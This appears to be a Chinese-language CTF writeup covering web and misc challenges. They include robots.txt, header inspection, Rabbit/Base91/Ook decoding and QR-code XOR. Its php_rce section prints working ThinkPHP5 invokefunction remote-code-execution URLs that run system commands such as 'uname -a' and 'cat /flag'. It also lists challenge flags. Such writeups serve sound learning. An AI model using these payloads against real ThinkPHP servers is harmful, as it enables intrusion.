CTF Misc Writeup

攻防世界

Web

php_rce

打开是个thinkphp5

image-20251017150404384

扫一遍发现有RCE漏洞

image-20251017150422353

利用RCE取phpinfo

http://61.147.171.35:56399/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

image-20251017150513414

尝试执行shell

http://61.147.171.35:56399/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=uname -a

image-20251017150659969

盲猜flag位置

http://61.147.171.35:56399/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

image-20251017150813745 image-20251017150844617

flag:flag{thinkphp5_rce}

robots

image-20251017121602575

Get index发现拿不到flag

image-20251017121709691

思路:robots,get请求/robots.txt

image-20251017121804801

把disallow拼接,得到flag

image-20251017121856200

cyberpeace{c4d6c278f7556c64b6e31a3f8951f462}

baby_web

image-20251017122321024

题目描述为找初始页面,进入网站发现是1.php,尝试index.php,发现302跳转,F12选择 Network 可见index.php,查看可在请求头找到flag。

image-20251017122340468

flag{very_baby_web}

Misc

CatCatCat

image-20251017165707055

得到两个文件

image-20251017165725533

winhex打开猫猫.jpg

image-20251017165941584

得知passwordis:catflag

猜测是密钥,结合分析txt的文件名,提到了兔子和91,使用rabbit对密文进行解密

image-20251017170053340

然后使用Base91解密,得到一堆cat,证明前面的步骤正确

image-20251017170110005

使用工具Ook! Programming Language - Esoteric Code Decoder, Online Translator解密,得到最终密文也就是flag

image-20251017170213345

明文:CATCTF{Th1s_V3ry_cute_catcat!!!}

提交的时候直接提交明文失败,题目说是要使用CatCTF{}包起来,那么最终把Cat换小写的,成功提交

最终Flag:CatCTF{Th1s_V3ry_cute_catcat!!!}

NewStarCTF2023

隐秘的图片

这题是朋友发给我的

image-20251017170656398

解包得到两个二维码但是扫出来没有Flag

image-20251017170755011

使用 Stegsolve工具开异或分析,先上传key1再上传key2,得出最终二维码

image-20251017170900768

扫XOR的结果得出最终Flag:flag{x0r_1m4ge_w1ll_g0t_fl4ggg_3394e4ecbb53}